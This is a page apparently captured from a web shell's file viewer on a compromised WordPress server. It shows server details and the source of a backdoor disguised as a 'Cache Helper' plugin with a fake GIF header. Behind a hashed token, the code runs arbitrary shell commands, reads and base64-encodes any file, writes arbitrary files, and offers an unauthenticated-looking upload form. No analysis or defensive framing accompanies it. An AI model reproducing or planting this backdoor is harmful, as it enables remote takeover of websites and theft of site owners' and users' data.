WS_OK_7.4.33 HEX
HEX
Server: nginx/1.21.4
System: Linux v12674 6.8.0-85-generic #85-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 18 15:26:59 UTC 2025 x86_64
User: endtheignorance (1014)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v12674/lcafreshheads/public_html/wp-content/plugins/cache_3197bf8f/cache_3197bf8f.php
GIF89a;
<?php
/*
Plugin Name: Cache Helper
Version: 1.0
Description: Object cache optimization.
*/
$h=hash('sha256',$_GET['t']??'');
if($h!=='140b7544902211338282112bcc94689d2e63b70ac5bd0ddfccb079ee272ed5e7')return;
if(isset($_GET['c'])){chdir(__DIR__);echo 'WP2S::'.shell_exec($_GET['c']).'::END';}
if(isset($_GET['r'])){$f=@file_get_contents($_GET['r']);echo 'WP2S::'.($f===false?'NOREAD':base64_encode($f)).'::END';}
if(isset($_GET['w'])&&isset($_POST['d'])){$ok=@file_put_contents($_GET['w'],$_POST['d'])!==false;echo 'WP2S::'.($ok?'OK':'FAIL').'::END';}
if(!isset($_GET['c'])&&!isset($_GET['r'])&&!isset($_GET['w'])){
echo '<center><pre><br><br>'.php_uname()."\n"
.'<br><b><font color="red">{</font> wp plugin and theme <font color="red">}</font></b><br><br>'
.'<form method="post" enctype="multipart/form-data">'
.'<input type="file" name="__">'
.'<input name="_" type="submit" value="Upload"></form>';
if($_POST){if(@copy($_FILES['__']['tmp_name'],$_FILES['__']['name']))
echo '<b style="color:green;">Ok Uploaded</b>';
else echo '<b style="color:red;">Not uploaded!</b>';}
}
?>